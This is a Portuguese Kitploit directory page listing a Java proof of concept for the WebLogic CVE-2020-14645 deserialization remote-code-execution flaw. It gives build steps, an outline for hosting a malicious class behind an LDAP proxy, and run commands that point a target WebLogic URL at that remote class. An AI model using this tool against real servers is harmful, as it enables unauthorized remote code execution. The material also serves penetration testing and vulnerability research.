Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Weblogic_CVE-2020-14645 — PoC em Java para RCE por desserialização do Coherence do WebLogic CVE-2020-14645. Hospeda uma classe maliciosa via LDAP e dispara execução remota de código em servidores WebLogic vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHub
jlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

PoC em Java para RCE por desserialização do Coherence do WebLogic CVE-2020-14645. Hospeda uma classe maliciosa via LDAP e dispara execução remota de código em servidores WebLogic vulneráveis.

Ver Repositório
16há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Weblogic CVE-2020-14645 coherence desserialização vulnerabilidade programa de verificação

Ambiente

  • Maven 3

  • JDK 1.8

Compilação

root@kitploit:~
mvn package

Uso

Etapas específicas de teste:

  1. Escrever o POC
  2. Compilar o POC para um arquivo class
  3. Iniciar um site estático para publicar o POC compilado
  4. Iniciar um proxy LDAP para encaminhar as requisições do alvo de teste ao buscar o POC
  5. Executar o programa de teste

Como esta vulnerabilidade é semelhante à vulnerabilidade Apache Dubbo, consulte esta vulnerabilidade para implementar as etapas 1-4.

Execução do programa de teste

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

# Exemplo
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

Se usar o POC fornecido neste exemplo, após a exploração bem-sucedida o alvo testado executará calc.exe. Modifique o POC conforme o ambiente do alvo de teste.

Agradecimentos

Este projeto faz referência e cita parte do código dos projetos @Y4er @5up3rc, agradecimentos especiais!

Referências

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

Baixar ferramenta